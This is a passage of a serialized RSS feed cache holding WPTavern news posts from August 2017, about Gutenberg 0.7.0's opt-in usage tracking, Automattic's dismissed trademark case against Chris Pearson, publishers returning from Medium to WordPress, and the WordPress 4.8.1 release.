Tracking";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73912";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"https://wptavern.com/gutenberg-0-7-0-adds-opt-in-usage-tracking";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6286:"<p><a href="https://make.wordpress.org/core/2017/08/04/whats-new-in-gutenberg-4th-august/" target="_blank">Gutenberg 0.7.0</a> was released just before the weekend with improvements to the writing flow and greater flexibility for theme authors to add their own customizations. Last week&#8217;s version 0.6.0 release made significant changes to the way paragraphs are created within text blocks, allowing for blocks to split when pressing enter. However, it inserted a &#8220;New Paragraph&#8221; placeholder that was distracting for users trying to stay in the flow of writing.</p>\n<p>Version 0.7.0 <a href="https://github.com/WordPress/gutenberg/pull/2161" target="_blank">hides placeholders on focus</a>, providing a cleaner experience of starting a new paragraph. After a user has already intuitively initiated a new paragraph by pressing enter, the &#8220;New Paragraph&#8221; placeholder holds little value. Removing the placeholder is a minor improvement that brings Gutenberg closer to providing a better experience for long-form writing.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/new-paragraph-gutenberg-0-7-0.png?ssl=1"><img /></a></p>\n<p>This release also introduces <a href="https://github.com/WordPress/gutenberg/pull/2186" target="_blank">theme support for customized color palettes and a shared component</a>, such as cover text and button blocks. The sample code below shows how easy it would be for theme authors to implement their own color palettes.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/theme-support-color-palette.png?ssl=1"><img /></a></p>\n<p>Gutenberg contributors have also added <a href="https://github.com/WordPress/gutenberg/pull/2021" target="_blank">theme support for wide images</a>. According to the inline docs, this allows for some blocks, such as the image block, to define a &#8220;wide&#8221; or &#8220;full&#8221; alignment by adding the corresponding classname to the block&#8217;s wrapper ( <code>alignwide</code> or <code>alignfull</code> ).</p>\n<p>These additions offer theme developers a better picture of where Gutenberg is headed in regards to themes. The plugin&#8217;s contributors are slowly building in more points of customization so that theme authors can add or override Gutenberg&#8217;s styles and provide additional opt-in features to their users.</p>\n<p>Theme support for wide images has already been committed to Tammie Lister&#8217;s experimental <a href="https://github.com/WordPress/gutenberg-theme" target="_blank">Gutenberg Theme</a>. The project was created to showcase how Gutenberg will interact with WordPress themes and is still a work in progress.</p>\n<h3>Gutenberg Adds Opt-In Data Collection</h3>\n<p>After updating the Gutenberg plugin to 0.7.0 and navigating to the editor, users are presented with the option to opt into data collection about their usage of the editor. The usage data, which is anonymous and does not include post content, is sent to WordPress.com for future analysis. Gutenberg contributor James Nylen explained how the data tracking works in a <a href="https://make.wordpress.org/core/2017/08/06/opt-in-usage-tracking-in-gutenberg/" target="_blank">post</a> on Make.WordPress.org.</p>\n<p>&#8220;The Gutenberg plugin contains a mechanism to count how often specific actions occur over time,&#8221; Nylen said. &#8220;If the user has previously clicked &#8216;Yes&#8217; on this screen, and an event occurs that has an associated <a href="https://github.com/WordPress/gutenberg/search?utf8=%E2%9C%93&q=bumpStat&type=" target="_blank">bumpStat call</a> in the Gutenberg code, then this event is sent to WordPress.com servers by loading a special &#8216;pixel&#8217; image.&#8221;</p>\n<p>Gutenberg&#8217;s tracking code stores the “group” and “name” sent with the bumpStat call (short strings of text), along with the time the event was recorded. Nylen said the team will use the data to improve the editor based on usage patterns. This data collection information is currently only available to those with access to WordPress.com servers.</p>\n<p>&#8220;As Gutenberg is an open-source community project, we view this data as belonging to the WordPress community, so we also plan to make this data available via a public dashboard,&#8221; Nylen said.</p>\n<p>He shared an example of the data that has been collected from the plugin over the past few days since 0.7.0 was released. This chart is a preview of the number and types of blocks that users have added to posts while testing the editor.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/gutenberg-add-block-total-e1502130689795.png?ssl=1"><img /></a></p>\n<p>&#8220;The approach taken here is very similar to Calypso&#8217;s event tracking code,&#8221; Nylen said in the <a href="https://github.com/WordPress/gutenberg/pull/2140" target="_blank">pull request for adding the data collection</a>. &#8220;We can use the data added in this PR to inform various decisions such as default order for blocks and whether some blocks are less suitable for core, and more generally this is a very useful technique to collect user experience data.&#8221;</p>\n<p>The majority of Gutenberg&#8217;s chief contributors are Automattic employees, so it makes sense that they would use the options and infrastructure available to them to quickly get data collection going in Gutenberg. However, the data from these tests needs to be shared with the greater WordPress community as soon as possible, since it is being collected in the name of the WordPress project. Ideally, it would have been set up to be displayed publicly before asking users to opt into the collection.</p>\n<p>Gutenberg contributors are also considering making the data collection more modular so that it could be used with other WordPress feature plugins or existing features in the future.</p>\n<p>&#8220;Maybe the tracking could be its own module, it could be useful outside of the editor (and other WP feature plugins later),&#8221; Riad Benguella <a href="https://github.com/WordPress/gutenberg/pull/2140#discussion_r130839438" target="_blank">said</a>. &#8220;Longer term (or not), WP.org needs its own tracking infrastructure and this could be very useful to enhance WordPress.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 07 Aug 2017 20:05:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:31;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:107:"WPTavern: Trademark Trial and Appeal Board Dismisses Automattic’s Trademark Dispute Against Chris Pearson";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73899";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:115:"https://wptavern.com/trademark-trial-and-appeal-board-dismisses-automattics-trademark-dispute-against-chris-pearson";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4102:"<p>In July 2015, Automattic <a href="http://www.adrforum.com/domaindecisions/1613723.htm">won its <span class="_Tgc"> Uniform Domain-Name Dispute-Resolution Policy</span> (UDRP) case</a> against <a href="http://www.pearsonified.com/">Chris Pearson</a> regarding Thesis.com after the <a href="http://www.adrforum.com/domaindecisions/1613723.htm">panel determined</a> that he failed to establish all three elements required under the ICANN Policy.</p>\n<blockquote><p>A party must satisfy all three of the burdens imposed under the Policy in order for the Panel to order transfer of a domain name from the entity registering it. Here, Complainant failed to establish that Respondent registered and used the disputed domain name in bad faith.</p>\n<p><em>See Starwood Hotels &amp; Resorts Worldwide, Inc. v. Samjo CellTech.Ltd</em>, FA 406512 (Nat. Arb. Forum Mar. 9, 2005) (finding that the complainant failed to establish that respondent registered and used the disputed domain name in bad faith because mere assertions of bad faith are insufficient for a complainant to establish Policy ¶ 4(a)(iii)). Therefore, the Panel finds that Complainant failed to support its allegations under Policy ¶ 4(a)(iii) and finds for Respondent.</p></blockquote>\n<p>This allowed Automattic to maintain ownership of <a href="https://themeshaper.com/">Thesis.com</a>. Automattic retaliated by <a href="http://ttabvue.uspto.gov/ttabvue/v?pno=92061714&pty=CAN&eno=1">filing a petition</a> for cancellation with the United States Patent and Trademark Office. In the petition, Automattic argued that the three trademarks owned by Pearson, DIYTHEMES, THESIS THEME, and THESIS, should be cancelled.</p>\n<p>For the past two years, legal teams for both parties have gone back and forth filing briefs, requests for extensions, and other documents. Earlier this year on April 20th, the Trademark Trial and Appeal Board <a href="http://ttabvue.uspto.gov/ttabvue/v?pno=92061714&pty=CAN&eno=19">dismissed the case</a> citing a lack of evidence and testimony from Automattic that establishes real interest and a reasonable belief in damages.</p>\n<blockquote><p>The record is devoid of any evidence concerning the nature of Petitioner’s (Automattic) commercial activities and its interest in Respondent’s (Chris Pearson) registered marks. Proof of standing in a Board proceeding is a low threshold.</p>\n<p>For example, Petitioner could have submitted testimony or competent documentary evidence as to its asserted need to use the terms comprising the marks and nature of its business activities to establish its standing.</p>\n<p>Petitioner neglected to do so. Thus, on the record before us, Petitioner has failed to establish a &#8216;real interest&#8217; and &#8216;reasonable belief in damage.&#8217; Accordingly, the cancellation proceeding is dismissed for Petitioner’s lack of standing.</p></blockquote>\n<p>On May 22nd,<a href="http://ttabvue.uspto.gov/ttabvue/v?pno=92061714&pty=CAN&eno=20"> Automattic filed a motion</a> for the board to reconsider its decision. On June 1st, the <a href="http://ttabvue.uspto.gov/ttabvue/v?pno=92061714&pty=CAN&eno=21">board denied the request</a> making its decision final.</p>\n<blockquote><p>Petitioner has failed to establish any error in the Final Decision. Rather, Petitioner expresses disagreement with the result reached and argues, for the first time on reconsideration, positions it should have alleged in its petition to cancel, supported with testimony and/or competent evidence, and raised in its trial brief.</p>\n<p>We will not infer from Petitioner’s scant allegations and evidence, and silence in its brief, proof of its standing to bring this cancellation proceeding. Petitioner’s motion for reconsideration is denied.</p></blockquote>\n<p>The decision allows Pearson to retain ownership of the DIYTHEMES, THESIS THEME, and THESIS trademarks. It&#8217;s unclear if this outcome will lead to more legal actions from either party. At the time of publishing, Pearson did not return a request for comment regarding the outcome and what his plans are for the Trademarks.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 05 Aug 2017 00:56:12 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:32;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:44:"WPTavern: In Case You Missed It – Issue 22";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wptavern.com?p=73917&preview=true&preview_id=73917";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://wptavern.com/in-case-you-missed-it-issue-22";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6881:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png?ssl=1" rel="attachment wp-att-50955"><img /></a>photo credit: <a href="http://www.flickr.com/photos/112901923@N07/16153818039">Night Moves</a> &#8211; <a href="https://creativecommons.org/licenses/by-nc/2.0/">(license)</a>\n<p>There’s a lot of great WordPress content published in the community but not all of it is featured on the Tavern. This post is an assortment of items related to WordPress that caught my eye but didn’t make it into a full post.</p>\n<h2>WordPress Foundation is Taking Submissions for The Kim Parsell Memorial Scholarship</h2>\n<p>For the third year in a row, the WordPress Foundation will award a woman contributor with financial need who has never attended WordCamp US the <a href="https://2017.us.wordcamp.org/kim-parsell-memorial-scholarship-2017/">Kim Parsell Memorial Scholarship</a>. The scholarship was created in memory of Kim Parsell who <a href="https://wptavern.com/kim-parsell-affectionately-known-as-wpmom-passes-away">passed away in 2015</a>.</p>\n<p>The scholarship covers the cost of the following:</p>\n<ul>\n<li>Travel to and from Nashville from the recipient’s home city,</li>\n<li>Hotel stay for the duration of the event,</li>\n<li>A ticket to WordCamp US 2017.</li>\n</ul>\n<p>The deadline to apply for the scholarship is Tuesday, August 15th at 12a.m. Pacific.</p>\n<blockquote class="wp-embedded-content"><p><a href="https://2017.us.wordcamp.org/kim-parsell-memorial-scholarship-2017/">Kim Parsell Memorial Scholarship 2017</a></p></blockquote>\n<p></p>\n<h2>The WordPress Economy is Fine</h2>\n<p>In a <a href="https://poststatus.com/future-wordpress-economy-im-not-worried/">guest post</a> for Post Status, Joshua Strebel, founder of Pagely, explains why he&#8217;s not worried about the WordPress economy.</p>\n<blockquote><p>In all channels, new market entrants or existing small shops are being out-gunned by the established players, or the buyers needs are being met upon install.</p>\n<p>So is the WordPress ecosystem shrinking? Yes, segments of it are and will continue to do so. It’s like in any industry: the car replaced the horse and the robot replaced the factory worker. What was successful in the New Market phase may not work in the more mature, &#8216;Existing Market&#8217; phase we are in.</p></blockquote>\n<p>It&#8217;s a good read and it&#8217;s interesting to think about what new segments will be created that don&#8217;t exist.</p>\n<h2>WPCampus 2017 Videos Are Now Available</h2>\n<p>WPCampus has published <a href="https://wpcampus.org/videos/">all of the videos</a> from its 2017 conference. They&#8217;re available to watch for free either on the site or the organization&#8217;s <a href="https://www.youtube.com/wpcampusorg">YouTube channel</a>. If you attended WPCampus 2017 or watched the livestream, please consider taking <a href="https://2017.wpcampus.org/conference-survey/">the following survey</a> that will help organizers plan for future events.</p>\n<h2>WordPress Case Studies Needed</h2>\n<p>The WordPress marketing team has published a survey seeking case studies from agencies, enterprises, and clients who use WordPress. The team has provided a sample <a href="https://make.wordpress.org/marketing/files/2017/08/WordPress-Marketing-Sample-Case-Study.pdf">Case Study</a> that can be used as a template. The case studies will help determine how WordPress is being used and help focus future marketing efforts.</p>\n<blockquote class="wp-embedded-content"><p><a href="https://make.wordpress.org/marketing/2017/08/02/calling-all-wordpress-agencies/">Calling all WordPress Agencies</a></p></blockquote>\n<p></p>\n<h2>New Preferred Languages Prototype</h2>\n<p>Pascal Birchler unveiled an updated prototype of the preferred languages project. The project adds UI to the WordPress backend that allows users to select multiple preferred languages. WordPress will try to load the translations for the first language that’s available. If it&#8217;s not available, it will fall back to the next language in the list.</p>\n<p>Birchler is seeking feedback on the newest <a href="https://github.com/swissspidy/preferred-languages">version of the plugin</a> and is working towards it being a merge candidate for WordPress 4.9.</p>\n<blockquote class="wp-embedded-content"><p><a href="https://make.wordpress.org/core/2017/05/20/preferred-languages-the-prototype/">Preferred Languages: The Prototype</a></p></blockquote>\n<p></p>\n<h2>WordPress&#8217; Emerging Dominance as a CMS of Choice for Law Firms</h2>\n<p>Kevin O&#8217; Keefe <a href="http://abovethelaw.com/2017/08/wordpress-to-dominate-as-content-management-system-for-all-law-firms/">explains why</a> WordPress is likely to become the dominant CMS of choice for law firms.</p>\n<blockquote><p>Just as Word has replaced WordPerfect as the word processing solution of choice for law firms, WordPress is likely to replace other content management systems for law firms, both large and small.</p></blockquote>\n<h2>WordPress 4.9 Expected This November</h2>\n<p>In the last developer&#8217;s chat, WordPress 4.9 development kicked off and is expected to be released in November. This release will focus on editing code, managing plugins and themes, a user-centric way to customize a site, and improvements to features recently added. Mel Choyce and Weston Ruter are co-release leads.</p>\n<blockquote class="wp-embedded-content"><p><a href="https://make.wordpress.org/core/2017/08/03/dev-chat-summary-august-2nd-4-9-week-1/">Dev Chat Summary: August 2nd (4.9 week 1)</a></p></blockquote>\n<p></p>\n<h2>Volunteers Needed for WordCamp US</h2>\n<blockquote class="wp-embedded-content"><p><a href="https://2017.us.wordcamp.org/2017/08/01/wcus-needs-you-volunteer-applications-are-now-open/">WCUS Needs You: Volunteer Applications Are Now Open</a></p></blockquote>\n<p></p>\n<h2>A Visit From St. Gutenberg</h2>\n<p><a href="https://wordpress.org/support/topic/catastophe-how-to-destroy-wordpress-in-2-weeks/">Perhaps the greatest one-star review on the WordPress plugin directory. </a></p>\n<h2>Minniepuu and Wapauul!</h2>\n<p>In what is a traditional part of this series, I end each issue by featuring a Wapuu design. For those who don&#8217;t know, Wapuu is the <a href="http://wapuu.jp/2015/12/12/wapuu-origins/">unofficial mascot</a> of the WordPress project. Minniepuu and Wapauul, designed by <a href="http://marktimemedia.com/">Michelle Schulp</a>, are the mascots of WordCamp Minneapolis 2017 that&#8217;s taking place this weekend.</p>\n<p>Minneapolis and St. Paul, MN are commonly referred to as the Twin Cities and the city&#8217;s Major League Baseball team is the Minnesota Twins.</p>\n<img />WordCamp Minneapolis 2017 Wapuus\n<p>That&#8217;s it for issue twenty-two. If you recently discovered a cool resource or post related to WordPress, please share it with us in the comments.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 05 Aug 2017 00:18:44 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:33;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:85:"WPTavern: Publishers Are Moving Back to WordPress After Short Experiments with Medium";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73902";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:96:"https://wptavern.com/publishers-are-moving-back-to-wordpress-after-short-experiments-with-medium";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:8358:"<a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/migration.jpg?ssl=1"><img /></a>photo credit: <a href="https://www.flickr.com/photos/hyku/2267820888/">hyku</a> &#8211; <a href="http://creativecommons.org/licenses/by-sa/2.0/">cc</a>\n<p><a href="https://www.theawl.com/" target="_blank">The Awl</a>, <a href="https://thinkprogress.org/" target="_blank">ThinkProgress</a>, <a href="https://filmschoolrejects.com/" target="_blank">Film School Rejects</a>, and several other publishers have moved back to WordPress after short experiments on Medium. In early 2016, Medium convinced a collection of small, independent publications to move to its platform but shortly thereafter discontinued its unsuccessful ad-driven publishing model <a href="https://www.buzzfeed.com/charliewarzel/when-you-launch-your-publication-the-same-day-medium-changes" target="_blank">without notifying publishers</a>.</p>\n<p>In March 2017, Medium CEO Ev Williams announced that his solution to fix the broken, ad-driven media industry was to fire up <a href="https://wptavern.com/medium-aims-to-fix-broken-media-with-new-5-subscription-program" target="_blank">a new $5 subscription program</a> that would put articles behind a paywall inside of the Medium network.</p>\n<p>Today The Awl, The Hairpin, and The Billfold announced the publications have <a href="https://www.theawl.com/2017/08/somethings-different/" target="_blank">moved back to WordPress</a> after switching to Medium in April 2016.</p>\n<p>&#8220;The move to Medium was a cool experiment, in my opinion, but the year is up and personally I missed the ads,&#8221; The Awl Editor Silvia Killingsworth said. <a href="https://www.thebillfold.com/2017/08/change-is-the-only-constant-in-life/" target="_blank">The Billfold&#8217;s announcement</a> cited Mediums&#8217; recent changes as the reason for the move back to WordPress:</p>\n<blockquote><p>Our move to Medium was an experiment to explore a different kind of business model, and that experiment is over now that the platform has moved in a different direction (<a href="https://www.axios.com/publishers-flee-medium-amid-business-model-changes-2440471520.html" target="_blank">you can read more in-depth about those changes here</a>).</p>\n<p>Adapting to change is all part of the many joys of being a small, independent publisher.</p></blockquote>\n<h3>Film School Rejects Returns to WordPress After 1-Year Experiment with Medium</h3>\n<p><a href="https://filmschoolrejects.com/what-happened-with-medium/" target="_blank">Film School Rejects (FSR) also returned to WordPress in May</a> after a year-long, rocky experiment with Medium. The publication was one of Medium&#8217;s first 12 premium publishers.</p>\n<p>&#8220;To be honest, I can&#8217;t afford, nor would my heart hold up for, a move back to a private server and WordPress,&#8221; FSR founder Neil Miller <a href="https://www.poynter.org/2017/why-publishers-are-sticking-with-medium-for-now/444507/" target="_blank">told Poynter in January</a> after Medium announced it was pivoting away from ad-driven media. &#8220;So, barring a miracle, my site will live and die on Medium. I&#8217;m optimistic that I&#8217;ll find some sort of solution and be able to remain on Medium.&#8221;</p>\n<p>Ultimately, Medium&#8217;s goals as a publisher of subscription content were at odds with FSR&#8217;s ability to sustain the publication. Miller said they had ported 10 years of content over to the platform after being promised a beautiful user experience and a way forward that would allow FSR to grown the business, continue to pay its writers, and keep the publication on the cutting edge.</p>\n<p>&#8220;What we were sold when we joined their platform is very different from what they&#8217;re offering as a way forward,&#8221; Miller told Poynter. &#8220;It&#8217;s almost as if Ev Williams wasn&#8217;t concerned that he was pulling out the rug from underneath publishers who had placed their trust in his vision for the future of journalism.&#8221;</p>\n<p>After moving FSR back to WordPress, Miller said the partnership with Medium was great until the company changed course to become a different type of platform.</p>\n<p>&#8220;As time went on, it became clear that Medium’s priorities had shifted from being a platform for independent publishers to being itself a publisher of premium, subscription-based content,&#8221; he said. &#8220;As we learned more about their future plans for the now-existent Medium ‘Members Only’ program, it became clear that our site wouldn’t be able to continue to operate the way we always had.&#8221;</p>\n<p>Miller said the process of trying a new platform and returning to WordPress made him realize that he &#8220;missed some of the customizable features of WordPress,&#8221; which led his team to work on some new features they will be launching in the future. The site has reinstated its banner advertising on pages.</p>\n<p>&#8220;We’d love to be able to do this all without any ads, but there’s no money in that,&#8221; Miller said. &#8220;And guess who doesn’t get paid if the site can’t make any money? The people who write articles, edit the site, make video essays, curate One Perfect Shot, and host podcasts.&#8221;</p>\n<h3>ThinkProgress Exits Medium, Founder Says Platform is No Longer Developed with Publishers in Mind</h3>\n<p><a href="https://thinkprogress.org/" target="_blank">ThinkProgress</a> was one of the largest publications to make the move to Medium last August. After less than a year, the site has moved back to WordPress, its previous publishing platform. ThinkProgress founder Judd Legum told <a href="http://www.poynter.org/2017/with-big-plans-to-staff-up-thinkprogress-is-leaving-medium-behind-update/465424/" target="_blank">Poynter</a> that the lack of advertising capabilities was not the reason his publication left the platform but rather because Medium no longer serves the best interests of publishers.</p>\n<p>&#8220;I&#8217;m certainly not eager to have a bunch of ads on the site — and we&#8217;re not going to,&#8221; Legum said. &#8220;I&#8217;d love to have none. And if it were possible, I&#8217;d be interested in figuring out a model where we don&#8217;t have to have any. But if it&#8217;s connected to a platform that&#8217;s not going to be developed with publishers in mind, it doesn&#8217;t really make sense to think through that as a platform. That sealed it for me.&#8221;</p>\n<p>ThinkProgress is taking its 8 to 10 million unique pageviews per month back into the independent publishing space. It is the latest of several other publishers leaving Medium after having been persuaded in 2016 to jump into Ev Williams&#8217; experiment with initial promises of free hosting, more traffic, and advertising money. Not all of the sites are moving back to WordPress, but most are looking to free themselves from Medium&#8217;s experiment on publishers and regain the ability to sell advertising and/or subscriptions.</p>\n<p><a href="https://www.axios.com/bill-simmons-moves-the-ringer-from-medium-to-vox-media-2426770782.html" target="_blank">The Ringer moved to Vox Media</a> at the end of May after Medium discontinued its advertising model. <a href="https://www.poynter.org/2017/after-being-wooed-by-medium-some-publishers-are-beginning-to-leave/459998/" target="_blank">The Pacific Standard left Medium</a> to focus on building custom features to drive subscription growth.</p>\n<p>Backchannel also moved its site off of the platform and <a href="https://www.wired.com/story/backchannel-is-moving-to-wired" target="_blank">is now publishing on Wired.com</a>. &#8220;In the time since Backchannel launched, Medium has shifted its business strategy, and it’s no longer as focused on helping publications like ours profit,&#8221; BackChannel Editor Jessi Hempel said.</p>\n<p>Medium&#8217;s new <a href="https://medium.com/membership" target="_blank">subscription revenue model</a> and partner program are still in beta but the returns have not been enough to convince publishers to stay, even with costly migrations back to tried and proven platforms like WordPress. Ad-driven publishing may not be the most ideal way to keep a publication afloat, but publishers moving away from Medium are not willing to stay on for the the startup&#8217;s experiment at the expense of their writers and staff.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 04 Aug 2017 23:09:07 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:34;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:59:"WPTavern: WordPress 4.8.1 Released, Adds Custom HTML Widget";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73825";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:69:"https://wptavern.com/wordpress-4-8-1-released-adds-custom-html-widget";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:901:"<p>WordPress 4.8.1 <a href="https://wordpress.org/news/2017/08/wordpress-4-8-1-maintenance-release/">is available for download</a> or as an update from the WordPress Dashboard. This release contains 29 bug fixes and improvements. The most notable addition is a dedicated <a href="https://wptavern.com/wordpress-4-8-1-adds-a-dedicated-custom-html-widget">Custom HTML widget</a>.</p>\n<img />Custom HTML Widget in WordPress 4.8.1\n<p>The Custom HTML widget works similar to the Text widget in WordPress 4.7 and below. To see a full list of changes in WordPress 4.8.1, check out the <a href="https://codex.wordpress.org/Version_4.8.1">release notes</a>. If you think you&#8217;ve discovered a bug, please report it in as much detail as possible on the <a href="https://wordpress.org/support/forum/how-to-and-troubleshooting/">WordPress support forums</a>. Twenty-two people contributed to this release.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 03 Aug 2017 20:26:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:35;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:23:"Matt: Website as 